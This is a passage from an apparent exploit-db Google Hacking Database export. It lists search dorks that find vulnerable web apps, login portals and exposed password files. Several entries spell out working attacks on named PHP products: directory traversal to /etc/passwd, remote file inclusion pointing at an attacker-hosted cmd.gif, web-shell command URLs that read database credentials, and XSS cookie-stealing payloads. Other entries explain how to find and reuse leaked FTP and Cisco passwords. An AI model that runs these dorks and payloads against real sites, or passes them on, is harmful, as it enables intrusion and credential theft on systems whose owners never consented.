"http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+ITWorking%22+-site%3Aihackstuff.com+-site%3Asecuritytracker.com+-forum+-hacker&btnG=Search", "shortDescription": "\"powered by ITWorking\"", "textualDescription": "saveWebPortal 3.4 remote code execution / admin check bypass / remote fileinclusion / cross site scripting author site: http://www.circeos.itdownload page: http://www.circeos.it/frontend/index.php?page=downloadsa) remote code execution:a user can bypass admin check, calling this url:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Sourcenow can leave a backdoor in header.php or some other file, example:after editing template, user can execute arbitrary system commands, through aurl like this:http://[target]/saveweb/header.php?command=ls%20-lato list directories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/password and admin panel username/password (now attacker have full access to site configuration... can go tohttp://[target]/saveweb/admin/to login...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto see passwd file...b) arbitrary file inclusion:a user can view any file on the target server,if not with .php extension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file resident on target server, if with .php extension,example :http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to cause victim user to execute commands on externalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00where cmd.gif is a file like this:c) xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)http://[target]/saveweb/header.php?count=>alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=\">alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=\">alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday=\"}alert(document.cookie)" }, { "signatureReferenceNumber": "1084", "link": "https://www.exploit-db.com/ghdb/1084/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "textualDescription": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible." }, { "signatureReferenceNumber": "1085", "link": "https://www.exploit-db.com/ghdb/1085/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "textualDescription": "qmail mail admin login pages.There are several vulnerabilities relating to this software" }, { "signatureReferenceNumber": "1086", "link": "https://www.exploit-db.com/ghdb/1086/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22web-cyradm%22%7C%22by+Luc+de+Louw%22+%22This+is+only+for+authorized+users%22+-tar.gz+-site:web-cyradm.org+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "textualDescription": "Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.The software on which web-cyradm relies on is completely free and opensource software. So you get the maximung flexibility which the lowest TCO." }, { "signatureReferenceNumber": "1087", "link": "https://www.exploit-db.com/ghdb/1087/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Powered+by+FUDForum+2.7%22+-site%3Afudforum.org+-johnny.ihackstuff&btnG=Search", "shortDescription": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "textualDescription": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.7" }, { "signatureReferenceNumber": "1088", "link": "https://www.exploit-db.com/ghdb/1088/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22You+have+requested+to+access+the+management+functions%22++-.edu&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"You have requested to access the management functions\" -.edu", "textualDescription": "Terracotta web manager admin login portal." }, { "signatureReferenceNumber": "1089", "link": "https://www.exploit-db.com/ghdb/1089/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=%22Please+authenticate+yourself+to+get+access+to+the+management+interface%22&btnG=Search", "shortDescription": "\"Please authenticate yourself to get access to the management interface\"", "textualDescription": "Photo gallery managment system login" }, { "signatureReferenceNumber": "1090", "link": "https://www.exploit-db.com/ghdb/1090/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=ext%3Ainc+%22pwd%3D%22+%22UID%3D%22&btnG=Google+Search", "shortDescription": "ext:inc \"pwd=\" \"UID=\"", "textualDescription": "Database connection strings including passwords" }, { "signatureReferenceNumber": "1091", "link": "https://www.exploit-db.com/ghdb/1091/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=inurl%3Achitchat.php+%22choose+graphic%22&btnG=Cerca+con+Google&meta=", "shortDescription": "inurl:chitchat.php \"choose graphic\"", "textualDescription": "rgod advises:Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic.software:site: http://www.cyber-cats.com/php/rgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.it[/code]" }, { "signatureReferenceNumber": "1092", "link": "https://www.exploit-db.com/ghdb/1092/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=%22Calendar+programming+by+AppIdeas.com%22+filetype%3Aphp&btnG=Cerca+con+Google&meta=", "shortDescription": "\"Calendar programming by AppIdeas.com\" filetype:php", "textualDescription": "phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.software:site: http://open.appideas.comdownload: http://open.appideas.com/Calendar/original advisory: http://rgod.altervista.org/phpccal.html" }, { "signatureReferenceNumber": "1093", "link": "https://www.exploit-db.com/ghdb/1093/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+MD-Pro%22+%7C+%22made+with+MD-Pro%22&start=0&start=0", "shortDescription": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "textualDescription": "MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution/ cross site scripting / path disclosure. This search does not find vulnerable versions.software:site: http://www.maxdev.com/description: http://www.maxdev.com/AboutMD.phtmloriginal advisory: http://rgod.altervista.org/maxdev1073.html" }, { "signatureReferenceNumber": "1094", "link": "https://www.exploit-db.com/ghdb/1094/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Software+PBLang%22+4.65+filetype%3Aphp", "shortDescription": "\"Software PBLang\" 4.65 filetype:php", "textualDescription": "my advisory:[quote]PBLang 4.65 (possibly prior versions) remote code execution / administrativecredentials disclosure / system information disclosure / cross site scripting /path disclosuresoftware:description: PBLang is a powerful flatfile Bulletin Board System. It combinesmany features of a professional board, but does not even require SQL support. Itis completely based on text-file.site: http://pblang.drmartinus.de/download: https://sourceforge.net/project/showfiles.php?group_id=629531) system disclosure:you can traverse directories and see any file (if not .php or .php3 etc.) andinclude any file on target system using '../' chars and null byte (%00), example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php: ...16 $usrname=$HTTP_GET_VARS['u'];17 @include($dbpath.'/'.$usrname.'temp'); ...2) remote code execution:board stores data in files, when you register a [username] file without extensionis created in /db/members directory, inside we have php code executed when youlogin, so in location field type:madrid\"; system($HTTP_POST_VARS[cmd]); echo \"in /db/members/[username] file we have...$userlocation=\"madrid\"; system($HTTP_GET_VARS[cmd]); echo \"\";...no way to access the script directly, /db/members is .htaccess protectedand extra lines are deleted from files after you login, so you should makeall in a POST request and re-registerthis is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure:you can see password hash of any user or admin sending the command:cat ./db/members/[username]4) cross site scripting:register and in location field type:madrid\"; echo \"alert(document.cookie)then check this url:http://[target]/[path]/setcookie.php?u=[username]%005) path disclosure:http://[target]/[path]/setcookie.php?u=%00googledork: \"Software PBLang\" filetype:phprgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.itoriginal advisory: http://rgod.altervista.org/pblang465.html[/quote]" }, { "signatureReferenceNumber": "1095", "link": "https://www.exploit-db.com/ghdb/1095/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+and+copyright+class-1%22++0.24.4&num=50", "shortDescription": "\"Powered by and copyright class-1\" 0.24.4", "textualDescription": "class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions...look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but... what happen if you try to upload a filewith this name? :shell.php.' or 'a' ='a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'you have bypassed the check... now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file...you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto see database username and passwordand so on...you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: \"Powered by and copyright class-1\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it" }, { "signatureReferenceNumber": "1096", "link": "https://www.exploit-db.com/ghdb/1096/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+by+Xcomic%22+&btnG=Cerca+con+Google&meta=", "shortDescription": "\"Powered by Xcomic\"", "textualDescription": "\"Powered by xcomic\"this is a recent exploit, you can retrieve any file on target systemby using \"../\" chars and null byte (%00), example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launch commands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html" }, { "signatureReferenceNumber": "1097", "link": "https://www.exploit-db.com/ghdb/1097/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=rdbqds+-site%3A.edu+-site%3A.mil+-site%3A.gov", "shortDescription": "rdbqds -site:.edu -site:.mil -site:.gov", "textualDescription": "Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word \"secret\" which equals rdbqds.. (1 char shift).It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. A big thank you to Golfo for the links he provided in the forum to assist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html" }, { "signatureReferenceNumber": "1098", "link": "https://www.exploit-db.com/ghdb/1098/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22Warning%3A%22+%22Cannot+execute+a+blank+command+in%22&meta=", "shortDescription": "\"Warning:\" \"Cannot execute a blank command in\"", "textualDescription": "\"Warning: passthru(): Cannot execute a blank command in\" \"Warning: system(): Cannot execute a blank command in\" \"Warning: exec(): Cannot execute a blank command in\" generally: \"Warning:\" \"Cannot execute a blank command in\" this a php error message, essentially it shows hacked pages links where someone leaved a backdoor and the page has error_reporting not set to 0... you can execute shell commands simply appending a var, guessing variable name, usually 'cmd' or 'command' or something else, example: http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd" }, { "signatureReferenceNumber": "1099", "link": "https://www.exploit-db.com/ghdb/1099/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&q=%22Mail-it+Now%21%22+intitle%3A%22Contact+form%22+%7C+inurl%3Acontact.php", "shortDescription": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "textualDescription": "Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.skyminds.net/source/description: a mail form scriptvulnerability: unsecure file creation -> remote code executionwhen you post an attachment and upload it to the server (usually to \"./upload/\" dir )the script rename the file in this way:[time() function result] + [-] + [filename that user choose]spaces are simply replaced with \"_\" chars.So a user can post an executable attachment, calculate the time() result locallythen, if attachment is a file like this:can launch commands on target system, example:http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at this url: http://rgod.altervista.org/mailitnow.html" }, { "signatureReferenceNumber": "1100", "link": "https://www.exploit-db.com/ghdb/1100/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&q=%22maxwebportal%22+inurl%3A%22default%22+%22snitz+forums%22+%2B%22homepage%22+-intitle%3Amaxwebportal", "shortDescription": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "textualDescription": "several vulnerabilities relating to this.MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. User interface allows members to add news, content, write reviews and share information among other registered users.h**p://www.maxwebportal.com/" }, { "signatureReferenceNumber": "1101", "link": "https://www.exploit-db.com/ghdb/1101/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+AzDg%22+%282.1.3+%7C+2.1.2+%7C+2.1.1%29&btnG=Search", "shortDescription": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "textualDescription": "AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:\" AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable \" etc. vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 ... else { if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') { include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; } ... you can include arbitrary file on the server using \"../\" and null byte (%00) (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : \"This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.\" However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ... but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url:http://rgod.altervista.org/azdg.html" }, { "signatureReferenceNumber": "1102", "link": "https://www.exploit-db.com/ghdb/1102/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "textualDescription": "iCMS - Content Management System...Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!Dont think there are any vulns attached to this" }, { "signatureReferenceNumber": "1103", "link": "https://www.exploit-db.com/ghdb/1103/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by%3A+Land+Down+Under+800%22+%7C++%22Powered+by%3A+Land+Down+Under+801%22+-+www.neocrome.net&btnG=Search", "shortDescription": "\"Powered by: Land Down Under 800\" | \"Powered by: Land Down Under 801\" - www.neocrome.net", "textualDescription": "Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/advisories/16878/" }, { "signatureReferenceNumber": "1104", "link": "https://www.exploit-db.com/ghdb/1104/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:%22Master+Account%22++%22Domain+Name%22+%22Password%22+inurl:/cgi-bin/qmailadmin+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "textualDescription": "There seems to be several vulns for qmail." }, { "signatureReferenceNumber": "1105", "link": "https://www.exploit-db.com/ghdb/1105/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+Gallery+v%22+%22%5Bslideshow%5D%22%7C%22images%22+inurl%3Agallery&btnG=Search", "shortDescription": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "textualDescription": "There is a script injection vuln for all versions.http://www.securityfocus.com/bid/14668" }, { "signatureReferenceNumber": "1106", "link": "https://www.exploit-db.com/ghdb/1106/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "textualDescription": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail" }, { "signatureReferenceNumber": "1107", "link": "https://www.exploit-db.com/ghdb/1107/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:%22Backup-Management+(phpMyBackup+v.0.4+beta+*+)%22+-johnny.ihackstuff&num=100&filter=0", "shortDescription": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "textualDescription": "phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP." }, { "signatureReferenceNumber": "1108", "link": "https://www.exploit-db.com/ghdb/1108/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Monster+Top+List%22+MTL+numrange%3A200-&btnG=Search", "shortDescription": "\"Powered by Monster Top List\" MTL numrange:200-", "textualDescription": "2 Step dork - Change url to add filename \"admin.php\" (just remove index.php&stuff=1&me=2 if you have to) for the admin login.This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective." }, { "signatureReferenceNumber": "1109", "link": "https://www.exploit-db.com/ghdb/1109/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22login+prompt%22+inurl%3AGM.cgi&btnG=Search", "shortDescription": "\"login prompt\" inurl:GM.cgi", "textualDescription": "GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content." }, { "signatureReferenceNumber": "1110", "link": "https://www.exploit-db.com/ghdb/1110/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=%22e107.org+2002/2003%22+inurl:forum_post.php%3Fnt&hl=en&lr=&c2coff=1&start=0&sa=N", "shortDescription": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "textualDescription": "e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.http://www.securityfocus.com/bid/14699" }, { "signatureReferenceNumber": "1111", "link": "https://www.exploit-db.com/ghdb/1111/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype:dat+inurl:Sites.dat", "shortDescription": "filetype:dat inurl:Sites.dat", "textualDescription": "If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory)." }, { "signatureReferenceNumber": "1112", "link": "https://www.exploit-db.com/ghdb/1112/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:%22enable+password+7%22", "shortDescription": "intext:\"enable password 7\"", "textualDescription": "some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com" }, { "signatureReferenceNumber": "1113", "link": "https://www.exploit-db.com/ghdb/1113/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Copyright+2004+%C2%A9+Digital+Scribe+v.1.4%22&hl=it&lr=&c2coff=1&filter=0", "shortDescription": "\"Copyright 2004 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Digital Scribe v.1.4\"", "textualDescription": "Digital Scribe v1.4 Login Bypass / SQL injection / remote code executionsoftware site: http://www.digital-scribe.org/description: \"Teachers have full control through a web-based interface. Designedfor easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.rgodsite: http://rgod.altervista.orgemail: retrogod at aliceposta it" }, { "signatureReferenceNumber": "1114", "link": "https://www.exploit-db.com/ghdb/1114/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=%22you+can+now+password%22+%7C+%22this+is+a+special+page+only+seen+by+you.+your+profile+visitors%22++inurl%3Aimchaos", "shortDescription": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\" inurl:imchaos", "textualDescription": "IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page." }, { "signatureReferenceNumber": "1115", "link": "https://www.exploit-db.com/ghdb/1115/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:%22XOOPS+Custom+Installation%22&hl=en&lr=&c2coff=1&start=20&sa=N", "shortDescription": "XOOPS Custom Installation", "textualDescription": "XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data." }, { "signatureReferenceNumber": "1116", "link": "https://www.exploit-db.com/ghdb/1116/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3A%22netbotz+appliance%22+-inurl%3A.php+-inurl%3A.asp+-inurl%3A.pdf+-inurl%3Asecuritypipeline+-announces", "shortDescription": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "textualDescription": "Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available." }, { "signatureReferenceNumber": "1117", "link": "https://www.exploit-db.com/ghdb/1117/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+Advanced+Transfer+Manager+v1.30%22", "shortDescription": "\"Powered by PHP Advanced Transfer Manager\"", "textualDescription": "PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scriptingrgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta it" }, { "signatureReferenceNumber": "1118", "link": "https://www.exploit-db.com/ghdb/1118/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&as_qdr=all&q=%22Welcome+to+Administration%22+%22General%22+%22Local+Domains%22+%22SMTP+Authentication%22+inurl%3Aadmin&btnG=Search", "shortDescription": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "textualDescription": "This reveals admin site for Argo Software Design Mail Server." }, { "signatureReferenceNumber": "1119", "link": "https://www.exploit-db.com/ghdb/1119/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?&q=%22powered+by+cutenews+1.4.%22", "shortDescription": "\"Powered by CuteNews\"", "textualDescription": "CuteNews 1.4.0 (possibly prior versions) remote code executionsoftware site: http://cutephp.com/description: \"Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ...\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta it" }, { "signatureReferenceNumber": "1120", "link": "https://www.exploit-db.com/ghdb/1120/", "category": "Files containing passwords", "querystring": "http://www.google.com.sg/search?hl=en&q=intitle%3Arapidshare+intext%3Alogin", "shortDescription": "intitle:rapidshare intext:login", "textualDescription": "Rapidshare login passwords." }, { "signatureReferenceNumber": "1121", "link": "https://www.exploit-db.com/ghdb/1121/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22PHProjekt+-+login%22+login+password&num=100", "shortDescription": "intitle:\"PHProjekt - login\" login password", "textualDescription": "PHProjekt is a group managing software for online calenders, chat, forums, etc. I looked around and i think the default admin login/pass is root/root. Results 1 - 23 of about 851 when i posted this" }, { "signatureReferenceNumber": "1122", "link": "https://www.exploit-db.com/ghdb/1122/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=Phaser+numrange%3A100-100000+Name+DNS+IP+%22More+Printers%22+index+help+filetype%3Ahtml+%7C+filetype%3Ashtml", "shortDescription": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "textualDescription": "This is a search for various phaser network printers. With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people." }, { "signatureReferenceNumber": "1123", "link": "https://www.exploit-db.com/ghdb/1123/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Orite+IC301%22+%7C+intitle:%22ORITE+Audio+IP-Camera+IC-301%22+-the+-a&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "textualDescription": "This search finds orite 301 netcams with audio capabilities." }, { "signatureReferenceNumber": "1124", "link": "https://www.exploit-db.com/ghdb/1124/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+GTChat+0.95%22%2B%22User+Login%22%2B%22Remember+my+login+information%22", "shortDescription": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "textualDescription": "There is a (adduser) remote denial of service vulnerabilty on version 0.95" }, { "signatureReferenceNumber": "1125", "link": "https://www.exploit-db.com/ghdb/1125/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22Version+1.4+%22%2B%22Login%22&safe=off&filter=0", "shortDescription": "http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22", "textualDescription": "WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to 